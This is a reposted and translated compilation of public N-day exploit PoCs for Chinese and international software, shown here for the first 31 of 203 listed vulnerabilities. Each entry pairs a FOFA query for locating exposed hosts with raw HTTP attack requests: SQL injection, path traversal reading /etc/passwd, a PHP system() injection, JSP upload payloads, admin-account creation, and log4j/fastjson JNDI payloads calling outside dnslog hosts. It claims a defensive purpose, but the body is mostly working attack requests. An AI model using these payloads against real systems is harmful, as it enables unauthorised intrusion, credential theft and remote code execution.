Compilation of Public Internet Vulnerabilities, 2023-09 to 2024-06 (repost)

Posted on 2024-6-5 14:31:29
Compilation of Public Internet Vulnerabilities, 2023-09 to 2024-06
道一安全 2024-06-05 07:41 Beijing
The following article is sourced from 网络安全新视界; author: 网络安全新视界.

Purpose: exploitation of N-day vulnerabilities is one of the most common attack methods in security offense and defense, and we hope this article is of some help to defenders. Defensive teams can use its contents to check their own exposure.

Sources: this article covers 203 POCs for high-severity vulnerabilities disclosed in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the internet and were collated and published by the 网络安全新视界 team.

Patches: all of the vulnerabilities are public; for patches or remediation, contact the product vendor.

Content: for reasons of length, a few POCs that are too long are replaced with the word PAYLOAD; search for the full POC yourself if you need it.

Legal: if anything in this article infringes a party's legitimate rights, contact the 网络安全新视界 team via the backend to have the content removed.

Statement

To keep things simple and easy to browse, there is no "reply to see the full list" gate. This article is the most complete version available; when using it, press F12 and search for the keyword you need.

Bookmark this article if you find it useful, or follow this public account (网络安全新视界).

Table of Contents

01
1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆HFOffice 医微云 SQL injection
17. 大华 DSS itcBulletin SQL injection
18. 大华 DSS digital surveillance system user_edit.action information disclosure
19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华ICC intelligent IoT management platform arbitrary file read
21. 大华ICC intelligent IoT management platform random remote code execution
22. 大华ICC intelligent IoT management platform log4j remote code execution
23. 大华ICC intelligent IoT management platform fastjson remote code execution
24. 用友NC 6.5 accept.jsp arbitrary file upload
25. 用友NC registerServlet JNDI remote code execution
26. 用友NC linkVoucher SQL injection
27. 用友NC showcontent SQL injection
28. 用友NC grouptemplet arbitrary file upload
29. 用友NC down/bill SQL injection
30. 用友NC importPml SQL injection
31. 用友NC runStateServlet SQL injection
32. 用友NC complainbilldetail SQL injection
33. 用友NC downTax/download SQL injection
34. 用友NC warningDetailInfo endpoint SQL injection
35. 用友NC-Cloud importhttpscer arbitrary file upload
36. 用友NC-Cloud soapFormat XXE
37. 用友NC-Cloud IUpdateService XXE
38. 用友U8 Cloud smartweb2.RPC.d XXE
39. 用友U8 Cloud RegisterServlet SQL injection
40. 用友U8-Cloud XChangeServlet XXE
41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友GRP-U8 SmartUpload01 file upload
43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友GRP-U8 bx_dj_check.jsp SQL injection
45. 用友GRP-U8 ufgovbank XXE
46. 用友GRP-U8 sqcxIndex.jsp SQL injection
47. 用友GRP A++Cloud government finance cloud arbitrary file read
48. 用友U8 CRM swfupload arbitrary file upload
49. 用友U8 CRM uploadfile.php endpoint arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. 泛微E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通T+ getstorewarehousebystore remote code execution
55. 畅捷通T+ getdecallusers information disclosure
56. 畅捷通T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通T+ keyEdit.aspx SQL injection
58. 畅捷通T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
66. 万户ezOFFICE collaboration platform SendFileCheckTemplateEdit SQL injection
67. 万户ezOFFICE wpsservlet arbitrary file upload
68. 万户ezOFFICE wf_printnum.jsp SQL injection
69. 万户ezOFFICE contract_gd.jsp SQL injection
70. 万户ezEIP success command execution
71. 邦永PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 掌上校园 service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 traffic-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp endpoint arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japan tosei self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联FE collaborative office platform editflow_manager SQL injection
90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 operations management center session command execution
93. 奇安信网神SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信网神SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. 广联达Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康NS-ASG application security gateway index.php SQL injection
135. 网康NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communications command-and-dispatch platform down_file.php SQL injection
138. 福建科立讯 communications command-and-dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communications command-and-dispatch platform editemedia.php SQL injection
140. 福建科立讯 communications command-and-dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communications command-and-dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire-and-rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景EHR OutputCode arbitrary file read
169. 宏景EHR downlawbase SQL injection
170. 宏景EHR DisplayExcelCustomReport arbitrary file read
171. 通天星CMSV6 vehicle positioning monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科云鉴 security management system setsystemtimeaction command execution
194. 飞企互联-FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. Cockpit assetsmanager_upload endpoint file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. 方正 all-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云EHR PtFjk file upload

POC List

02
1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"
Replace password with the MD5 hash of a password of your choice.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. 深信服 NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. 斐讯 Phicomm router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin backend with the default account admin, then send the following request.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step 1>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload is the double URL-encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"
After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request: the injected function executes a base64-encoded command.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the lab target; it executes the id command. The request-header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a database function to compute the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. 大华 DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. 大华 DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. 大华ICC intelligent IoT management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. 大华ICC intelligent IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. 大华ICC intelligent IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. 大华ICC intelligent IoT management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

Path of the uploaded file:
/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
